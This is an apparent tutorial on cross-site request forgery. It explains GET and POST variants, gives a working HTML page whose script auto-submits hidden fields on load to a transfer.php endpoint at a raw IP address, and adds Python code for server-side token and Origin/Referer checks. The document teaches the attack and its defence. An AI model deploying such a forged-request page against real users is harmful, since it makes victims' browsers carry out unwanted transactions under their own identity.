Cross-Site Request Forgery (CSRF)
CSRF stands for Cross Site Request Forgery. It is easily confused with XSS. For CSRF, the two key points are the cross-site request and the forgery of that request: because the target site has neither a token nor a Referer check, every parameter of the user's sensitive operation is predictable to an attacker, who can therefore forge an identical request that the victim's browser submits with the victim's identity, achieving the attacker's goal.
By request type, CSRF can be divided into GET-type and POST-type.
By attack technique, it can be divided into HTML CSRF, JSON Hijacking, Flash CSRF, and so on.
HTML CSRF
Using a form to forge a POST-type request:
<!--click.html-->
<html>
<body>
<h1>
This page forges an HTTP POST request.
</h1>
<script type="text/javascript">
  function post(url, fields) {
    // create a <form> element.
    var p = document.createElement("form");
    // construct the form
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    // append the form to the current page.
    document.body.appendChild(p);
    // submit the form
    p.submit();
  }
  function csrf_hack() {
    // start from an empty string; a bare "var fields;" would prepend "undefined"
    var fields = "";
    // The following are form entries that need to be filled out
    // by attackers. The entries are made hidden, so the victim
    // won't be able to see them.
    fields += "<input type='hidden' name='target' value='aaaaaa'>";
    fields += "<input type='hidden' name='money' value='10000'>";
    fields += "<input type='hidden' name='messages' value='test'>";
    post('http://173.82.206.142:8005/transfer.php', fields);
  }
  // invoke csrf_hack() after the page is loaded.
  window.onload = function() {
    csrf_hack();
  }
</script>
</body>
</html>
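As an added example, not part of the original page: the server-side token and Origin/Referer checks mentioned above, which are exactly what the forged click.html request lacks, written in Python with only the standard library. The origin https://bank.example, the session id and the secret are constructed values, and handle_transfer stands in for the page's transfer.php.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values for the example: in a real deployment the secret comes from
# server configuration and session_id from the victim's authenticated session cookie.
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://bank.example"  # hypothetical origin that serves transfer.php


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: nonce.HMAC(secret, session_id:nonce).
    The attacker's page cannot read this value, so it cannot be copied into click.html."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers):
    """Independent second check: Origin (or, failing that, Referer) must name our site.
    A form auto-submitted from the attacker's page carries the attacker's origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # fail closed when neither header is present
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def handle_transfer(session_id, headers, form):
    """Server-side handler standing in for transfer.php: returns (accepted, reason)."""
    if not origin_allowed(headers):
        return False, "origin mismatch"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return False, "missing or invalid csrf token"
    return True, f"transfer {form['money']} to {form['target']}"
```

The forged request fails both checks: its Origin is the attacker's page, and even with a spoofed Origin it carries no token the server can verify for the victim's session.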